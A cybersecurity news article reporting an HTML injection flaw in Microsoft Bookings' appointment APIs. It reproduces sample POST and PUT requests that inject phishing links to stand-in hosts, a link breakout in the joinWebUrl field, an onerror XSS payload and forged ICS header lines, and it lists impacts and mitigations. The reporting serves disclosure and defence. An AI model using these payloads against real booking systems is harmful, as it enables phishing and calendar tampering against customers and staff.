Monday, May 12, 2025
HomeCyber Security NewsMicrosoft Bookings Vulnerability Allows Unauthorized Changes to Meeting Details

Microsoft Bookings Vulnerability Allows Unauthorized Changes to Meeting Details

Published on

SIEM as a Service

Follow Us on Google News

Security researchers have uncovered a significant vulnerability in Microsoft Bookings, the scheduling tool integrated with Microsoft 365.

The flaw, discovered through technical analysis of the service’s appointment creation and update APIs, allows unauthorized modification of meeting details, posing risks such as phishing, calendar manipulation, and information leakage.

Technical Details and Vulnerability Overview

The vulnerability arises from inadequate input validation and sanitization in several key fields used by Microsoft Bookings.

- Advertisement - Google News
Booking Confirmation Email
Booking Confirmation Email

When a user, either a legitimate customer or a malicious actor, creates or modifies a meeting, the following fields in the API are not sufficiently filtered:

  • appointment.serviceNotes
  • appointment.additionalNotes
  • appointment.body.content

These fields accept arbitrary HTML, which is subsequently embedded in confirmation emails, Teams invitations, and attached ICS (calendar) files.

Updated Confirmation Email
Updated Confirmation Email

Example: Exploiting the Booking API

1. Appointment Creation (POST Request)

POST /BookingsService/api/V1/bookingBusinessesc2/EXAMPLETestseite@bookings.example.de/appointments?app=BookingsC2&n=11 HTTP/1.1
Host: outlook.office365.com
Content-Type: application/json
{
  "appointment": {
    "serviceNotes": "<b style='color:red'>Injected Note!</b>",
    "body": {
      "contentType": "html",
      "content": "<a href='https://phishing-site.com'>Join meeting here</a>"
    },
   ...
  }
}

This request will cause the injected HTML to appear in all meeting-related emails and invites.

2. Appointment Modification via Rescheduling (PUT Request)


PUT /BookingsService/api/V1/bookingBusinessesc2/EXAMPLETestseite@bookings.example.de/appointments/[AppointmentID]?app=BookingsC2&n=16 HTTP/1.1
Host: outlook.office365.com
Content-Type: application/json
{
  "appointment": {
    "serviceNotes": "<a href='https://malicious.com'>Click me!</a>",
    "joinWebUrl": "https://legit.com\"></a><a href=\"https://evil.com\" style=\"color:red;\">Malicious Link</a><!--",
    "body": {
      "contentType": "html",
      "content": "<img src='x' onerror='alert(1)'>"
    },   
    ...
  }
}

This can result in confirmation emails and calendar invites embedding unauthorized or malicious content, with ICS files manipulated via custom headers like X-ALT-DESC and altered ORGANIZER fields:

X-ALT-DESC;FMTTYPE=text/html:<a href="https://phishing-site.com"><h1>Phishing here!</h1></a>
ORGANIZER;CN=Attacker:mailto:attacker@example.com
  • Phishing Attacks: Malicious links can be presented as legitimate meeting links, easily tricking users.
  • Calendar Tampering: Attackers can alter timings, extend durations, or add/remover attendees, disrupting business operations.
  • Sensitive Data Exposure: Notes meant for staff only could be leaked to customers or third parties through repeated edits.
  • Denial of Service: By booking extremely long meetings, attackers can exhaust staff calendars, blocking new appointments.

Microsoft has enacted mitigations, but organizations should:

  • Scrutinize booking parameters for unexpected content
  • Educate staff on phishing risks from calendar invites
  • Monitor for unusual booking activity

This vulnerability underscores the importance of robust server-side validation, especially in customer-facing scheduling tools.

Organizations relying on Microsoft Bookings should remain vigilant and keep systems up-to-date to protect against evolving threats.

Setting Up SOC Team? – Download Free Ultimate SIEM Pricing Guide (PDF) For Your SOC Team -> Free Download

Divya
Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Latest articles

VMware Tools Vulnerability Allows Attackers to Modify Files and Launch Malicious Operations

Broadcom-owned VMware has released security patches addressing a moderate severity insecure file handling vulnerability...

Metasploit Update Adds Erlang/OTP SSH Exploit and OPNSense Scanner

The open-source penetration testing toolkit Metasploit has unveiled a major update, introducing four new...

Google Researchers Use Mach IPC to Uncover Sandbox Escape Vulnerabilities

Google Project Zero researchers have uncovered new sandbox escape vulnerabilities in macOS using an...

Cybercriminals Hide Undetectable Ransomware Inside JPG Images

A chilling new ransomware attack method has emerged, with hackers exploiting innocuous JPEG image...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

VMware Tools Vulnerability Allows Attackers to Modify Files and Launch Malicious Operations

Broadcom-owned VMware has released security patches addressing a moderate severity insecure file handling vulnerability...

Metasploit Update Adds Erlang/OTP SSH Exploit and OPNSense Scanner

The open-source penetration testing toolkit Metasploit has unveiled a major update, introducing four new...

Google Researchers Use Mach IPC to Uncover Sandbox Escape Vulnerabilities

Google Project Zero researchers have uncovered new sandbox escape vulnerabilities in macOS using an...